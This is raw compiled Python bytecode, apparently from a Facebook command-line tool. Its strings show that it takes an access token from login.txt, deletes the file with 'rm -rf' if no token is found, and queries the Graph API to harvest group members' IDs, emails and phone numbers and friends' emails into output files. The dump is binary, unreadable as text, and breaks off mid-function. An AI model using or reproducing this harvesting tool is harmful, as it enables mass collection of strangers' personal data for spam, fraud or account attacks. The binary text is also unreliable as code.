\x00|\x08\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00rG\x02\x01\x01\x01d!\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00rs\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x99\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\xbb\x02\x01\x01\x01d$\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(%\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s2\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member id \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x13\x00\x00\x00out/member_grup.txtR\x11\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=Rl\x00\x00\x00Rj\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97mg-C\x1c\xeb\xe26\x1a?sB\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get id \x1b[1;97m....s.\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] 
Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00idmemR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\t\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00t\x03\x00\x00\x00aswR\x98\x00\x00\x00t\x02\x00\x00\x00ret\x01\x00\x00\x00sRm\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x89\x00\x00\x00\x0e\x02\x00\x00sr\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\t\x01\x0f\x01\x1b\x01\x12\x01\x11\x01\x11\x01\x15\x01 
\x00\r\x00\x11\x01\n\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\x00\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x13\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00d\x11\x00\x14GHt\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00t\x0c\x00j\r\x00d\x14\x00|\x01\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0e\x00j\x0f\x00|\x05\x00j\x10\x00\x83\x01\x00}\x06\x00x\xcb\x00|\x06\x00d\x16\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\x14\x00|\x07\x00d\x17\x00\x19\x17d\x18\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x19\x00\x19\x83\x01\x00\x01|\x04\x00j\x16\x00|\t\x00d\x19\x00\x19d\x1a\x00\x17\x83\x01\x00\x01d\x1b\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1c\x00\x17|\t\x00d\x19\x00\x19\x17d\x1d\x00\x17|\t\x00d\x0c\x00\x19\x17d\x1a\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1e\x00\x83\x01\x00\x01Wq[\x01\x04t\x11\x00k\n\x00r\x19\x02\x01\x01\x01q[\x01Xq[\x01W|\x04\x00j\x1c\x00\x83\x00\x00\x01d\x10\x00d\x11\x00\x14GHd\x1f\x00GHd 
\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d!\x00\x83\x01\x00}\n\x00t\x03\x00j\x1d\x00d\x12\x00d"\x00|\n\x00\x17\x83\x02\x00\x01d#\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00r\xa9\x02\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xd5\x02\x01\x01\x01d%\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\xfb\x02\x01\x01\x01d&\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\x1d\x03\x01\x01\x01d\'\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S((\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s5\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member email \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x16\x00\x00\x00out/em_member_grup.txtR\x11\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=Rl\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sW\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email from member group \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] 
Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00emmemR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\x98\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00Rm\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8a\x00\x00\x00H\x02\x00\x00s~\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\t\x01\x0f\x01\x1b\x01\x12\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\
x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\x00\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x13\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00d\x11\x00\x14GHt\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00t\x0c\x00j\r\x00d\x14\x00|\x01\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0e\x00j\x0f\x00|\x05\x00j\x10\x00\x83\x01\x00}\x06\x00x\xcb\x00|\x06\x00d\x16\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\x14\x00|\x07\x00d\x17\x00\x19\x17d\x18\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x19\x00\x19\x83\x01\x00\x01|\x04\x00j\x16\x00|\t\x00d\x19\x00\x19d\x1a\x00\x17\x83\x01\x00\x01d\x1b\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1c\x00\x17|\t\x00d\x19\x00\x19\x17d\x1d\x00\x17|\t\x00d\x0c\x00\x19\x17d\x1a\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1e\x00\x83\x01\x00\x01Wq[\x01\x04t\x11\x00k\n\x00r\x19\x02\x01\x01\x01q[\x01Xq[\x01W|\x04\x00j\x1c\x00\x83\x00\x00\x01d\x10\x00d\x11\x00\x14GHd\x1f\x00GHd \x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d!\x00\x83\x01\x00}\n\x00t\x03\x00j\x1d\x00d\x12\x00d"\x00|\n\x00\x17\x83\x02\x00\x01d#\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00r\xa9\x02\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xd5\x02\x01\x01\x01d%\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\xfb\x02\x01\x01\x01d&\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\x1d\x03\x01\x01\x01d\'\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S((\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s<\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member phone number \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x16\x00\x00\x00out/no_member_grup.txtR\x11\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=Rl\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?s^\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get phone number from member group \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] 
Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00nomemR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\x98\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00Rm\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8b\x00\x00\x00\x88\x02\x00\x00s~\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\t\x01\x0f\x01\x1b\x01\x12\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xa6\x02\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\x8c\x01t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00t\x10\
x00d\t\x00\x83\x01\x00\x01d\n\x00d\x0b\x00\x14GHt\x00\x00d\x0c\x00d\r\x00\x83\x02\x00}\x03\x00x\xcb\x00|\x02\x00d\x0e\x00\x19D]\xbf\x00}\x04\x00t\x0b\x00j\x0c\x00d\x0f\x00|\x04\x00d\x10\x00\x19\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x0e\x00|\x05\x00j\x0f\x00\x83\x01\x00}\x06\x00yt\x00t\x11\x00j\x12\x00|\x06\x00d\x12\x00\x19\x83\x01\x00\x01|\x03\x00j\x13\x00|\x06\x00d\x12\x00\x19d\x13\x00\x17\x83\x01\x00\x01d\x14\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x15\x00\x17|\x06\x00d\x12\x00\x19\x17d\x16\x00\x17|\x06\x00d\x17\x00\x19\x17d\x13\x00\x17Gt\x16\x00j\x17\x00j\x18\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x18\x00\x83\x01\x00\x01Wq\xdf\x00\x04t\x19\x00k\n\x00r\x9d\x01\x01\x01\x01q\xdf\x00Xq\xdf\x00W|\x03\x00j\x1a\x00\x83\x00\x00\x01d\n\x00d\x0b\x00\x14GHd\x19\x00GHd\x1a\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1b\x00d\x1b\x00\x83\x01\x00}\x07\x00t\x03\x00j\x1c\x00d\x0c\x00d\x1c\x00|\x07\x00\x17\x83\x02\x00\x01d\x1d\x00|\x07\x00\x17GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00r-\x02\x01\x01\x01d\x1f\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00rY\x02\x01\x01\x01d \x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nI\x00\x04t\x19\x00k\n\x00r\x7f\x02\x01\x01\x01d!\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01n#\x00\x04t\x0b\x00j \x00j!\x00k\n\x00r\xa1\x02\x01\x01\x01d"\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(#\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s3\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend email \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x13\x00\x00\x00out/email_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | R0\x00\x00\x00g-C\x1c\xeb\xe26\x1a?sE\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] 
Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x02\x00\x00\x00emR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R,\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\x95\x00\x00\x00R\x80\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R?\x00\x00\x00\xc8\x02\x00\x00sl\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x13\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s/\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\